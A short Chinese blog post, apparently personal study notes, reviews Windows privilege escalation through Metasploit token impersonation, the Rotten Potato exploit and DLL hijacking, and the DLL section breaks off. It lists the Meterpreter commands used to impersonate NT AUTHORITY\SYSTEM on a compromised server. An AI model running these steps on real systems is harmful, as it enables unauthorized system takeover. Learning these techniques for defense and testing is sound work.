windows提权补充继数据库和内核提权

今天又是不紧不慢的一天,复习一下windows提权手法吧

一.令牌窃取严格意义来说算不上提权,只是盗用别人的身份

先决条件你已经拿到对方的反弹shell

在msf上一波猛操作

1.查看现在的身份 :getuid

2.查看当前操作系统的信息 :sysinfo

3.msf自带令牌窃取工具可以直接使用 use incognito

4.因为拿到的只是普通用户,所以令牌截取只能搞到自己,可以用 list_token -u 查看系统具有的令牌,进行切换

二.烂土豆提权(它比热土豆可靠,全版本可用,立即生效,不需要像热土豆那样需要重启)

提权路径:

1.先把烂土豆的exp放在受害服务器的机器上

2.执行该exp

3.这个需要配合令牌盗取

use incognito;list_tokens -u;execute-cH -f ./potato.exe;list_tokens -u impersonate_token "NT AUTHORITY\\SYSTEM"

三.dll劫持

什么是dll?

windows程序启动的时候都需要dll,如果这些dll不存在,则可以通过在应用程序要查的位置放上我们的恶意dll.

一般程序加载dll的顺序是

 原理简而言之就是伪造dll,欺骗应用程序从而的得以调用

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值